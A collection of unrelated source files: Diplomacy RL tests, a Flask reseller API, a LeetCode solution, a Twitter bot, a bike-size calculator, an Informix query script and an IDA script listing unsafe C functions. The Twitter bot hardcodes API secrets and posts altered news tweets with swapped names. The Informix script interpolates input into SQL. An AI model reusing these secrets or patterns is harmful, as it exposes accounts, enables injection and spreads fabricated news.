('int', 'gcn_size', 24, 'Size of graph convolution outputs.'),
('int', 'lstm_size', 64, 'LSTM (Encoder and Decoder) size.'),
('int', 'attn_size', 30, 'LSTM decoder attention size.'),
('int', 'value_embedding_size', 64, 'Embedding size.'),
('int', 'value_h1_size', 16, 'The size of the first hidden layer in the value calculation'),
('int', 'value_h2_size', 16, 'The size of the second hidden layer in the value calculation'),
('bool', 'use_v_dropout', True, 'Use variational dropout (same mask across all time steps)'),
('bool', 'use_xla', False, 'Use XLA compilation.'),
('str', 'mode', 'self-play', 'The RL training mode.')]
def run_tests(self):
""" Run all tests """
IOLoop.current().run_sync(self.run_tests_async)
@gen.coroutine
def run_tests_async(self):
""" Run tests in an asynchronous IO Loop """
from diplomacy_research.utils.tensorflow import tf
self.graph = tf.Graph()
with self.graph.as_default():
yield self.build_algo_and_adapter()
saved_game_proto = yield self.get_saved_game_proto()
yield self.test_clear_buffers()
yield self.test_learn(saved_game_proto)
assert self.adapter.session.run(self.algorithm.version_step) == 0
yield self.test_update()
yield self.test_init()
assert self.adapter.session.run(self.algorithm.version_step) == 1
yield self.test_get_priorities(saved_game_proto)
@gen.coroutine
def test_learn(self, saved_game_proto):
""" Tests the algorithm learn method """
power_phases_ix = self.algorithm.get_power_phases_ix(saved_game_proto, 1)
yield self.algorithm.learn([saved_game_proto], [power_phases_ix], self.advantage)
@gen.coroutine
def test_get_priorities(self, saved_game_proto):
""" Tests the algorithm get_priorities method """
power_phases_ix = self.algorithm.get_power_phases_ix(saved_game_proto, 1)
yield self.algorithm.clear_buffers()
yield self.algorithm.learn([saved_game_proto], [power_phases_ix], self.advantage)
priorities = yield self.algorithm.get_priorities([saved_game_proto], self.advantage)
assert len(priorities) == len(self.algorithm.list_power_phases_per_game.get(saved_game_proto.id, []))
@gen.coroutine
def test_update(self):
""" Tests the algorithm update method """
results = yield self.algorithm.update(memory_buffer=None)
for eval_tag in self.algorithm.get_evaluation_tags():
assert eval_tag in results
assert results[eval_tag]
@gen.coroutine
def test_init(self):
""" Tests the algorithm init method """
yield self.algorithm.init()
@gen.coroutine
def test_clear_buffers(self):
""" Tests the algorithm clear_buffers method """
yield self.algorithm.clear_buffers()
@gen.coroutine
def build_algo_and_adapter(self):
""" Builds adapter """
from diplomacy_research.utils.tensorflow import tf
policy_model_ctor = self.get_policy_model()
dataset_builder_ctor = self.get_policy_builder()
policy_adapter_ctor = self.get_policy_adapter()
extra_proto_fields = self._algorithm_ctor.get_proto_fields()
hparams = self.parse_flags(self.get_policy_load_args()
+ load_value_args()
+ load_draw_args()
+ self.get_algo_load_args()
+ self.get_test_load_args())
# Generating model
dataset = QueueDataset(batch_size=32,
dataset_builder=dataset_builder_ctor(extra_proto_fields=extra_proto_fields))
model = policy_model_ctor(dataset, hparams)
model = ValueModel(model, dataset, hparams)
model = DrawModel(model, dataset, hparams)
model.finalize_build()
self.create_algorithm(dataset, model, hparams)
self.adapter = policy_adapter_ctor(dataset, self.graph, tf.Session(graph=self.graph))
self.advantage = self._algorithm_ctor.create_advantage_function(hparams,
gamma=0.99,
penalty_per_phase=DEFAULT_PENALTY)
# Setting cache path
filename = '%s_savedgame.pbz' % self.model_type
self.saved_game_cache_path = os.path.join(HOME_DIR, '.cache', 'diplomacy', filename)
@gen.coroutine
def get_saved_game_proto(self):
""" Tests the generate_saved_game_proto method """
# Creating players
player = ModelBasedPlayer(self.adapter)
rule_player = RuleBasedPlayer(easy_ruleset)
players = [player, player, player, player, player, player, rule_player]
def env_constructor(players):
""" Env constructor """
env = gym.make('DiplomacyEnv-v0')
env = LimitNumberYears(env, 5)
env = RandomizePlayers(env, players)
env = AutoDraw(env)
return env
# Generating game
saved_game_proto = None
if os.path.exists(self.saved_game_cache_path):
with open(self.saved_game_cache_path, 'rb') as file:
saved_game_proto = read_next_proto(SavedGameProto, file, compressed=True)
if saved_game_proto is None:
saved_game_proto = yield generate_trajectory(players, self.reward_fn, self.advantage, env_constructor)
with open(self.saved_game_cache_path, 'wb') as file:
write_proto_to_file(file, saved_game_proto, compressed=True)
# Validating game
assert saved_game_proto.id
assert len(saved_game_proto.phases) >= 10
# Validating policy details
for phase in saved_game_proto.phases:
for power_name in phase.policy:
nb_locs = len(phase.policy[power_name].locs)
assert (len(phase.policy[power_name].tokens) == nb_locs * TOKENS_PER_ORDER # Token-based
or len(phase.policy[power_name].tokens) == nb_locs) # Order-based
assert len(phase.policy[power_name].log_probs) == len(phase.policy[power_name].tokens)
assert phase.policy[power_name].draw_action in (True, False)
assert 0. <= phase.policy[power_name].draw_prob <= 1.
# Validating rewards
assert saved_game_proto.reward_fn == DefaultRewardFunction().name
for power_name in saved_game_proto.assigned_powers:
assert len(saved_game_proto.rewards[power_name].value) == len(saved_game_proto.phases) - 1
# Returning saved game proto for other tests to use
return saved_game_proto
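# A hypothetical sketch (not part of the original module) of how a concrete test
# is expected to wire this class up; every My* name below is a placeholder:
#
#   class MyAlgorithmSetup(AlgorithmSetup):
#       @staticmethod
#       def get_policy_model():              # the PolicyModel class under test
#           return MyPolicyModel
#       @staticmethod
#       def get_policy_builder():            # the policy's DatasetBuilder class
#           return MyDatasetBuilder
#       @staticmethod
#       def get_policy_adapter():            # the PolicyAdapter class
#           return MyPolicyAdapter
#
#   MyAlgorithmSetup(MyAlgorithm, my_algo_load_args, 'order_based').run_tests()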
| mit | 3,197,060,478,943,303,000 | 46.512 | 114 | 0.611635 | false |
inova-tecnologias/jenova | src/jenova/resources/reseller.py | 1 | 14834 | from flask_restful import abort, request
from datetime import datetime
import uuid
from jenova.resources.base import BaseResource, abort_if_obj_doesnt_exist
from jenova.models import (
Client, Reseller, Domain, User,
ClientSchema, ResellerSchema, DomainSchema, Service, ResellerServices
)
from jenova.components import Security
from jenova.components import db
class ResellerListResource(BaseResource):
def __init__(self):
filters = ['name']
super(ResellerListResource, self).__init__(filters)
def get(self):
self.parser.add_argument('limit', type=int, location='args')
self.parser.add_argument('offset', type=int, location='args')
reqdata = self.parser.parse_args()
offset, limit = reqdata.get('offset') or 0, reqdata.get('limit') or 25
resellers = Reseller.query\
.offset(offset)\
.limit(limit)\
.all()
if not resellers:
abort(404, message = 'Could not find any reseller')
return {
'response' : {
'resellers' : ResellerSchema(many=True).dump(resellers).data
}
}
class ResellerListByQueryResource(BaseResource):
def __init__(self):
filters = ['name']
super(ResellerListByQueryResource, self).__init__(filters)
def get(self, by_name_query):
self.parser.add_argument('limit', type=int, location='args')
self.parser.add_argument('offset', type=int, location='args')
reqdata = self.parser.parse_args()
offset, limit = reqdata.get('offset') or 0, reqdata.get('limit') or 100
if offset > limit or limit > 100:
abort(400, message = 'Wrong offset/limit specified. Max limit permited: 100')
total_records = Reseller.query\
.filter(Reseller.name.like('%' + by_name_query + '%'))\
.count()
if total_records == 0:
abort(404, message = 'Could not find any reseller using query: %s' % by_name_query)
resellers = Reseller.query\
.filter(Reseller.name.like('%' + by_name_query + '%'))\
.offset(offset)\
.limit(limit)\
.all()
response_headers = {}
if limit < total_records:
new_offset = limit + 1
new_limit = new_offset + (limit - offset)
response_headers['Location'] = '%s?offset=%s&limit=%s' % (request.base_url, new_offset, new_limit)
return {
'response' : {
'resellers' : ResellerSchema(many=True).dump(resellers).data
}
}, 200, response_headers
class ResellerServicesListResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ResellerServicesListResource, self).__init__(filters)
class ResellerDomainListResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ResellerDomainListResource, self).__init__(filters)
# def get(self, target_reseller):
# reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
def get(self, target_reseller):
self.parser.add_argument('limit', type=int, location='args')
self.parser.add_argument('offset', type=int, location='args')
reqdata = self.parser.parse_args()
offset, limit = reqdata.get('offset') or 0, reqdata.get('limit') or 25
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
count = Domain.query\
.filter(Reseller.id == Client.reseller_id)\
.filter(Domain.client_id == Client.id)\
.filter(Reseller.id == reseller.id)\
.count()
domains = Domain.query\
.filter(Reseller.id == Client.reseller_id)\
.filter(Domain.client_id == Client.id)\
.filter(Reseller.id == reseller.id)\
.offset(offset)\
.limit(limit)\
.all()
if not domains:
abort(404, message='Could not find any domains')
return {
'response' : {
'domains' : DomainSchema(many=True).dump(domains).data,
'total' : count
}
}
class ResellerResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ResellerResource, self).__init__(filters)
def get(self, target_reseller):
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
return {
'response' : {
'resellers' : ResellerSchema().dump(reseller).data
}
}
def delete(self, target_reseller):
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
if reseller.clients.all():
abort(409, message = 'The reseller still have clients')
db.session.delete(reseller)
db.session.commit()
return '', 204
def put(self, target_reseller):
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
self.parser.add_argument('email', type=str)
self.parser.add_argument('company', type=unicode)
self.parser.add_argument('phone', type=str)
self.parser.add_argument('enabled', type=bool)
self.parser.add_argument('services', type=str, action='append')
reqdata = self.parser.parse_args(strict=True)
reseller.email = reqdata.get('email') or reseller.email
reseller.company = reqdata.get('company') or reseller.company
reseller.phone = reqdata.get('phone') or reseller.phone
if reqdata.get('enabled') != None:
reseller.enabled = reqdata.get('enabled')
# Delete all services from the association proxy
del reseller.services[:]
for svc in reqdata.get('services') or []:
service = abort_if_obj_doesnt_exist('name', svc, Service)
reseller.services.append(service)
db.session.commit()
return '', 204
def post(self, target_reseller):
target_reseller = target_reseller.lower()
if Reseller.query.filter_by(name=target_reseller).first():
abort(409, message='The reseller {} already exists'.format(target_reseller))
# TODO: Validate email field
self.parser.add_argument('email', type=str, required=True)
self.parser.add_argument('company', type=unicode, required=True)
self.parser.add_argument('phone', type=str)
self.parser.add_argument('login_name', type=unicode, required=True)
self.parser.add_argument('login', type=str, required=True)
self.parser.add_argument('password', type=str, required=True)
self.parser.add_argument('services', type=str, action='append')
reqdata = self.parser.parse_args(strict=True)
reseller = Reseller(name = target_reseller,
email = reqdata['email'],
company = reqdata['company'],
)
reseller.phone = reqdata.get('phone')
# associate services to reseller
if reqdata.get('services'):
for service_name in set(reqdata['services']):
service = Service.query.filter_by(name = service_name).first()
if not service:
db.session.rollback()
abort(404, message = 'Could not find service: %s' % service)
reseller_service = ResellerServices(
reseller = reseller,
service = service
)
db.session.add(reseller_service)
db.session.flush()
user = User(login = reqdata['login'],
name = reqdata['login_name'],
email = reqdata['email'],
password = Security.hash_password(reqdata['password']),
admin = True
)
reseller.user = user
db.session.add(reseller)
db.session.commit()
reseller = Reseller.query.filter_by(name=target_reseller).first()
return {
'response' : {
'reseller_id' : reseller.id,
'user_id' : user.id
}
}, 201
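# Example of a request body accepted by ResellerResource.post (all values below
# are hypothetical):
#   {
#     "email": "[email protected]", "company": "ACME Corp", "phone": "555-0100",
#     "login_name": "Jane Admin", "login": "jane", "password": "secret",
#     "services": ["service-a", "service-b"]
#   }
# Each name in "services" must match an existing Service or the request aborts
# with 404; on success the new reseller id and admin user id are returned (201).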
class ClientListResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ClientListResource, self).__init__(filters)
@property
def scope(self):
return 'client'
# Overrided
def is_forbidden(self, **kwargs):
""" Check for access rules:
A global admin must not have any restrictions.
Only an admin must access this resource.
A requester must have access of your own clients
"""
target_reseller = kwargs.get('target_reseller')
if self.is_global_admin: return
if not self.is_admin and not request.method == 'GET':
      abort(403, message = 'Permission denied! Does not have enough permissions to access this resource')
if not target_reseller:
abort(400, message = 'Could not find "target_reseller"')
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
if self.request_user_reseller_id != reseller.id:
      abort(403, message = 'Permission denied! The reseller does not belong to the requester.')
def get(self, **kwargs):
target_reseller = kwargs.get('target_reseller')
self.parser.add_argument('limit', type=int, location='args')
self.parser.add_argument('offset', type=int, location='args')
by_name_query = kwargs.get('by_name_query') or ''
reqdata = self.parser.parse_args()
offset, limit = reqdata.get('offset') or 0, reqdata.get('limit') or 25
if self.is_global_admin:
clients = Client.query \
.filter(Client.name.like('%' + by_name_query + '%') | Client.company.like('%' + by_name_query + '%'))\
.offset(offset)\
.limit(limit)\
.all()
return {
'response' : {
'reseller_id' : None,
'clients' : ClientSchema(many=True).dump(clients).data
}
}
elif self.is_admin:
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
if by_name_query:
clients = Client.query.join(Reseller, Client.reseller_id == Reseller.id) \
.filter(Reseller.name == target_reseller) \
.filter(Client.name.like('%' + by_name_query + '%') | Client.company.like('%' + by_name_query + '%'))\
.offset(offset)\
.limit(limit)\
.all()
else:
clients = Client.query.join(Reseller, Client.reseller_id == Reseller.id) \
.filter(Reseller.name == target_reseller) \
.offset(offset)\
.limit(limit)\
.all()
else:
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
clients = Client.query.filter_by(id = self.request_user_client_id).first()
clients = [clients]
if not clients:
abort(404, message = 'Could not find any clients')
return {
'response' : {
'reseller_id' : reseller.id,
'clients' : ClientSchema(many=True).dump(clients).data
}
}
class ClientResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ClientResource, self).__init__(filters)
@property
def scope(self):
return 'client'
# Overrided
def is_forbidden(self, target_reseller, target_client):
""" Check for access rules:
A global admin must not have any restrictions.
A requester admin must create and delete clients
A requester must have access to your own clients
"""
if self.is_global_admin: return
# Only admin can create and delete clients
if not self.is_admin and not request.method in ['GET', 'PUT']:
      abort(403, message = 'Permission denied! Does not have enough permissions to access this resource')
if not target_reseller:
abort(400, message = 'Could not find "target_reseller"')
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
if self.request_user_reseller_id != reseller.id:
      abort(403, message = 'Permission denied! The reseller does not belong to the requester.')
def get(self, target_reseller, target_client):
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
client = abort_if_obj_doesnt_exist(self.filter_by, target_client, Client)
client_result = ClientSchema().dump(client)
return {
'response' : {
'client' : client_result.data
}
}
def delete(self, target_reseller, target_client):
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
client = abort_if_obj_doesnt_exist(self.filter_by, target_client, Client)
if client.domain.all():
abort(409, message = 'There are still domains associated with this client')
db.session.delete(client)
db.session.commit()
return '', 204
def put(self, target_reseller, target_client):
abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
client = abort_if_obj_doesnt_exist('name', target_client, Client)
# TODO: Validate email field
self.parser.add_argument('email', type=str)
self.parser.add_argument('phone', type=str)
self.parser.add_argument('company', type=str)
self.parser.add_argument('reseller_name', type=str)
reqdata = self.parser.parse_args()
# Check if the user belongs to the reseller
client.email = reqdata.get('email') or client.email
client.phone = reqdata.get('phone') or client.phone
client.company = reqdata.get('company') or client.company
print client.email, client.phone, client.company
if reqdata.get('reseller_name'):
if not self.is_global_admin:
abort(403, message = 'Permission denied! Does not have enough permissions.')
newreseller = Reseller.query.filter_by(name = reqdata.get('reseller_name')).first()
else:
newreseller = Reseller.query.filter_by(name = target_reseller).first()
client.reseller_id = newreseller.id
db.session.commit()
return '', 204
def post(self, target_reseller, target_client):
target_client = target_client.lower()
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
if Client.query.filter_by(name=target_client).first():
abort(409, message='The client {} already exists'.format(target_client))
#sleep(2)
# TODO: Validate email field
self.parser.add_argument('email', type=str, required=True, case_sensitive=True)
self.parser.add_argument('login_name', type=str)
self.parser.add_argument('login', type=str, case_sensitive=True)
self.parser.add_argument('password', type=str)
self.parser.add_argument('company', type=str, required=True)
self.parser.add_argument('enable_api', type=bool, default=False)
self.parser.add_argument('admin', type=bool, default=False)
reqdata = self.parser.parse_args()
# Check if the user belongs to the reseller
client = Client(
reseller_id = reseller.id,
name = target_client,
email = reqdata['email'],
company = reqdata['company']
)
if reqdata['login'] and reqdata['login_name'] and reqdata['password']:
user = User(login = reqdata['login'],
name = reqdata['login_name'],
email = reqdata['email'],
password = Security.hash_password(reqdata['password']),
api_enabled = reqdata['enable_api'],
admin = reqdata['admin']
)
client.user = [user]
db.session.add(client)
db.session.commit()
client = Client.query.filter_by(name=target_client).one()
return {
'response' : {
'client_id' : client.id
}
}, 201 | apache-2.0 | -3,406,313,545,690,063,400 | 34.154028 | 112 | 0.649656 | false |
kingdaa/LC-python | lc/842_Split_Array_into_Fibonacci_Sequence.py | 1 | 2475 | # 842. Split Array into Fibonacci Sequence
# Difficulty: Medium
# Given a string S of digits, such as S = "123456579", we can split it into a
# Fibonacci-like sequence [123, 456, 579].
#
# Formally, a Fibonacci-like sequence is a list F of non-negative integers
# such that:
#
# 0 <= F[i] <= 2^31 - 1, (that is, each integer fits a 32-bit signed integer
# type);
# F.length >= 3;
# and F[i] + F[i+1] = F[i+2] for all 0 <= i < F.length - 2.
# Also, note that when splitting the string into pieces, each piece must not
# have extra leading zeroes, except if the piece is the number 0 itself.
#
# Return any Fibonacci-like sequence split from S, or return [] if it cannot
# be done.
#
# Example 1:
#
# Input: "123456579"
# Output: [123,456,579]
# Example 2:
#
# Input: "11235813"
# Output: [1,1,2,3,5,8,13]
# Example 3:
#
# Input: "112358130"
# Output: []
# Explanation: The task is impossible.
# Example 4:
#
# Input: "0123"
# Output: []
# Explanation: Leading zeroes are not allowed, so "01", "2", "3" is not valid.
# Example 5:
#
# Input: "1101111"
# Output: [110, 1, 111]
# Explanation: The output [11, 0, 11, 11] would also be accepted.
# Note:
#
# 1 <= S.length <= 200
# S contains only digits.
class Solution:
def splitIntoFibonacci(self, S):
"""
:type S: str
:rtype: List[int]
"""
INT_MAX = 2 ** 31 - 1
def dfs(S, index, path):
if index == len(S) and len(path) >= 3:
return True
for i in range(index, len(S)):
if S[index] == "0" and i > index:
break
num = int(S[index:i + 1])
if num > INT_MAX:
break
l = len(path)
if l >= 2 and num > path[l - 1] + path[l - 2]:
break
if len(path) < 2 or (
num == path[l - 1] + path[l - 2]):
path.append(num)
if dfs(S, i + 1, path):
return True
path.pop()
return False
res = []
dfs(S, 0, res)
return res
if __name__ == '__main__':
s1 = "123456579"
s2 = "11235813"
s3 = "112358130"
s4 = "0123"
s5 = "1101111"
sol = Solution()
print(sol.splitIntoFibonacci(s1))
print(sol.splitIntoFibonacci(s2))
print(sol.splitIntoFibonacci(s3))
print(sol.splitIntoFibonacci(s4))
print(sol.splitIntoFibonacci(s5))
| mit | 6,509,765,307,642,917,000 | 25.902174 | 78 | 0.532929 | false |
mattmelachrinos/Creative-Programming | MelachrinosMatthew_Bot/TwitterBot.py | 1 | 2392 | import random
import twitter
import json
players = []
teams = []
with open('player_names','r') as player_file:
for player in player_file:
players.append(player)
with open('football_teams','r') as teams_file:
for team in teams_file:
teams.append(team)
random_team = random.choice(teams)
random_player = random.choice(players)
#Keys and Tokens
Consumer_Key = "MsB3P0A9c8DPsbLYCyEVcmAA9"
Consumer_Secret = "gstX2eUuBOte0Zpow8mHPLujt7r5yRndzgLMq4ofV1ASLPiR4O"
Access_Token = "851599589878771712-AAB4jMmz8RoZRm08rVH8WNKISc4kuJe"
Access_Token_Secret = "uACJNnJYF5fG12KcUesPXSDHMwZiKfABdTnkKSVFNYo6N"
# connect to Twitter with our OAuth settings
api = twitter.Api(consumer_key = Consumer_Key, consumer_secret = Consumer_Secret, access_token_key = Access_Token, access_token_secret = Access_Token_Secret)
#Twitter Query
query = "https://api.twitter.com/1.1/search/tweets.json?q=%nfl&since_id=24012619984051000&result_type=mixed&count=15"
def generate_tweet(text):
for team in teams:
if team.strip() in text:
index = text.find(team.strip())
text = text[:index] + random_team.strip() + text[index+len(team)-1:]
break
for player in players:
if player.strip() in text:
index = text.find(player.strip())
text = text[:index] + random_player.strip() + text[index+len(player)-1:]
break
return text
def main():
# search_results = api.GetSearch(raw_query="q=nfl%20&result_type=recent&since=2014-07-19&count=1")
# print search_results
# search_results = json.dumps(search_results)
# tweet_list = []
# for line in search_results:
# tweet_list.append(json.loads(line))
#
# print tweet_list
incoming_tweet = '''Seahawks GM says team has listened to trade offers regarding cornerback Richard Sherman http://apne.ws/2nKxQda'''
tweet = generate_tweet(incoming_tweet)
if len(tweet) > 140:
tweet = tweet[:140]
try:
status = api.PostUpdate(tweet) # try posting
print '- success!'
with open("Tweets.txt","a") as tweets_file:
tweets_file.write("\n")
tweets_file.write(incoming_tweet + "\n")
tweets_file.write(tweet + "\n")
except twitter.TwitterError, e: # if an error, let us know
print '- error posting!'
print e
if __name__ == "__main__":
main()
| mit | -2,408,954,984,201,946,600 | 30.893333 | 157 | 0.661371 | false |
carthagecollege/django-djdoop | djdoop/bin/get_ens.py | 1 | 1541 | # -*- coding: utf-8 -*-
import os, sys
# env
sys.path.append('/usr/local/lib/python2.7/dist-packages/')
sys.path.append('/usr/lib/python2.7/dist-packages/')
sys.path.append('/usr/lib/python2.7/')
sys.path.append('/data2/django_projects/')
sys.path.append('/data2/django_third/')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djdoop.settings")
from djzbar.utils.informix import do_sql
from optparse import OptionParser
"""
Fetch data from an Informix database
"""
# set up command-line options
desc = """
Accepts as input a college ID
"""
parser = OptionParser(description=desc)
parser.add_option(
"-i", "--cid",
help="Please provide a college ID.",
dest="cid"
)
FIELDS = ['aa','beg_date','end_date','line1','line2','line3',
'phone','phone_ext','cell_carrier','opt_out']
CODES = ['MIS1','MIS2','ICE','ICE2','ENS']
def main():
"""
main method
"""
for c in CODES:
print "++%s++++++++++++++++++++++" % c
sql = "SELECT * FROM aa_rec WHERE aa = '%s' AND id='%s'" % (c,cid)
result = do_sql(sql).fetchone()
for f in FIELDS:
if result[f]:
print "%s = %s" % (f,result[f])
######################
# shell command line
######################
if __name__ == "__main__":
(options, args) = parser.parse_args()
cid = options.cid
mandatories = ['cid',]
for m in mandatories:
if not options.__dict__[m]:
print "mandatory option is missing: %s\n" % m
parser.print_help()
exit(-1)
sys.exit(main())
| bsd-3-clause | -1,375,509,877,524,543,000 | 23.078125 | 74 | 0.565217 | false |
jackcrowe/bike-tools | bikesizecalculator.py | 1 | 1881 | """
bikesizecalculator:: a module for calculating the bike size appropriate for a person.
"""
from math import *
# globals to store categorization of bike types
mountain_geometry = "MTN"
road_geometry = "ROAD"
stepthrough_geometry = "STEP"
# dictionary for bike type to geometry categorization
bike_type_categories = {
'Touring' : road_geometry,
'Commuter' : road_geometry,
'Track' : road_geometry,
'Road' : road_geometry,
'Mixte' : stepthrough_geometry,
'Hardtail' : mountain_geometry,
'XC' : mountain_geometry }
""" calculates the correct bike size for the given bike type and person's height"""
def calculate_bike_size(bike_type, inseam):
category = get_geometry_categorization(bike_type)
if category == road_geometry:
return get_road_size(inseam)
else:
return get_mountain_size(inseam)
""" generates a craigslist query given an array of bike types and a person's height"""
def generate_craigslist_query(bike_types, inseam):
if len(bike_types) == 0:
return ''
query = ''
for bike_type in bike_types:
bike_size = int(calculate_bike_size(bike_type, inseam))
query += '"'+bike_type+' '+str(bike_size)+'"|'
location = 'http://chicago.craigslist.org/'
category = 'bik'
search_type = 'T'
search_url = '%ssearch/%s?query=%s&srchType=%s' % (
location, category, query, search_type)
return search_url
""" looks up the category of geometry for a bike type """
def get_geometry_categorization(bike_type):
return bike_type_categories[bike_type]
""" returns the appropriate road bike size for a person of the given height """
def get_road_size(inseam):
return floor(1.72*float(inseam) - 0.68)
""" returns the appropriate mountain bike size for a person of the given height """
def get_mountain_size(inseam):
return inseam-10
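# Example usage (values follow from the formulas above; the URL reflects the
# hardcoded Chicago craigslist location and 'bik' category):
#   calculate_bike_size('Road', 32)  -> 54.0   # floor(1.72 * 32 - 0.68)
#   calculate_bike_size('XC', 32)    -> 22     # 32 - 10
#   generate_craigslist_query(['Road'], 32)
#     -> 'http://chicago.craigslist.org/search/bik?query="Road 54"|&srchType=T'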
| apache-2.0 | 5,846,033,641,118,190,000 | 32.607143 | 86 | 0.672515 | false |
WinHeapExplorer/WinHeap-Explorer | IDAscripts/dll_parser.py | 1 | 11768 | '''
BSD 2-Clause License
Copyright (c) 2013-2016,
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
''' This script is used to perform system dlls parsing to get a list of potentially
dangerous library calls and their instructions
'''
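# Assumed invocation (the exact IDA executable name and flags depend on the IDA
# version installed): run the script in IDA batch mode against a system dll,
# e.g. on Windows:
#   set WINHE_RESULTS_DIR=C:\winhe_results
#   idaq.exe -A -S"dll_parser.py" C:\Windows\System32\msvcrt.dll
# When WINHE_RESULTS_DIR is set, main() saves the results there and exits IDA
# automatically; otherwise results are written to the current working directory.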
import os
import sys
import idc
import idaapi
import idautils
from time import strftime
''' banned functions MSDN SDLC '''
list_of_banned_functions = ["strcpy", "strcpyA", "strcpyW", "wcscpy", "_tcscpy",\
"_mbscpy", "StrCpy", "StrCpyA", "StrCpyW", "lstrcpy", "lstrcpyA",\
"lstrcpyW", "_tccpy", "_mbccpy", "_ftcscpy", "strncpy", "wcsncpy",\
"_tcsncpy", "_mbsncpy", "_mbsnbcpy", "StrCpyN", "StrCpyNA", \
"StrCpyNW", "StrNCpy", "strcpynA", "StrNCpyA", "StrNCpyW", \
"lstrcpyn", "lstrcpynA", "lstrcpynW"]
list_of_banned_functions += ["strcat", "strcatA", "strcatW", "wcscat", "_tcscat", \
"_mbscat", "StrCat", "StrCatA", "StrCatW", "lstrcat", \
"lstrcatA", "lstrcatW", "StrCatBuff", "StrCatBuffA", \
"StrCatBuffW", "StrCatChainW", "_tccat", "_mbccat", \
"_ftcscat", "strncat", "wcsncat", "_tcsncat", "_mbsncat",\
"_mbsnbcat", "StrCatN", "StrCatNA", "StrCatNW", "StrNCat", \
"StrNCatA", "StrNCatW", "lstrncat", "lstrcatnA", \
"lstrcatnW", "lstrcatn"]
list_of_banned_functions += ["sprintfW", "sprintfA", "wsprintf", "wsprintfW", \
"wsprintfA", "sprintf", "swprintf", "_stprintf", \
"wvsprintf", "wvsprintfA", "wvsprintfW", "vsprintf", \
"_vstprintf", "vswprintf"]
list_of_banned_functions += ["wvsprintf", "wvsprintfA", "wvsprintfW", "vsprintf", \
"_vstprintf", "vswprintf"]
list_of_banned_functions += ["_fstrncpy", " _fstrncat", "gets", "_getts", "_gettws"]
list_of_banned_functions += ["IsBadWritePtr", "IsBadHugeWritePtr", "IsBadReadPtr", \
"IsBadHugeReadPtr", "IsBadCodePtr", "IsBadStringPtr"]
list_of_banned_functions += ["memcpy", "RtlCopyMemory", "CopyMemory", "wmemcpy"]
''' not recommended functions MSDN SDLC '''
list_of_not_recommended_functions = ["scanf", "wscanf", "_tscanf", "sscanf", "swscanf", \
"_stscanf"]
list_of_not_recommended_functions += ["wnsprintf", "wnsprintfA", "wnsprintfW", \
"_snwprintf", "snprintf", "sntprintf _vsnprintf", \
"vsnprintf", "_vsnwprintf", "_vsntprintf", \
"wvnsprintf", "wvnsprintfA", "wvnsprintfW"]
list_of_not_recommended_functions += ["_snwprintf", "_snprintf", "_sntprintf", "nsprintf"]
list_of_not_recommended_functions += ["_vsnprintf", "_vsnwprintf", "_vsntprintf", \
"wvnsprintf", "wvnsprintfA", "wvnsprintfW"]
list_of_not_recommended_functions += ["strtok", "_tcstok", "wcstok", "_mbstok"]
list_of_not_recommended_functions += ["makepath", "_tmakepath", "_makepath", "_wmakepath"]
list_of_not_recommended_functions += ["_splitpath", "_tsplitpath", "_wsplitpath"]
list_of_not_recommended_functions += ["snscanf", "snwscanf", "_sntscanf"]
list_of_not_recommended_functions += ["_itoa", "_itow", "_i64toa", "_i64tow", \
"_ui64toa", "_ui64tot", "_ui64tow", "_ultoa", \
"_ultot", "_ultow"]
list_of_not_recommended_functions += ["CharToOem", "CharToOemA", "CharToOemW", \
"OemToChar", "OemToCharA", "OemToCharW", \
"CharToOemBuffA", "CharToOemBuffW"]
list_of_not_recommended_functions += ["alloca", "_alloca"]
list_of_not_recommended_functions += ["strlen", "wcslen", "_mbslen", "_mbstrlen", \
"StrLen", "lstrlen"]
list_of_not_recommended_functions += ["ChangeWindowMessageFilter"]
WINHE_RESULTS_DIR = None
def enumerate_function_chunks(f_start):
'''
The function gets a list of chunks for the function.
@f_start - first address of the function
@return - list of chunks
'''
# Enumerate all chunks in the function
chunks = list()
first_chunk = idc.FirstFuncFchunk(f_start)
chunks.append((first_chunk, idc.GetFchunkAttr(first_chunk, idc.FUNCATTR_END)))
next_chunk = first_chunk
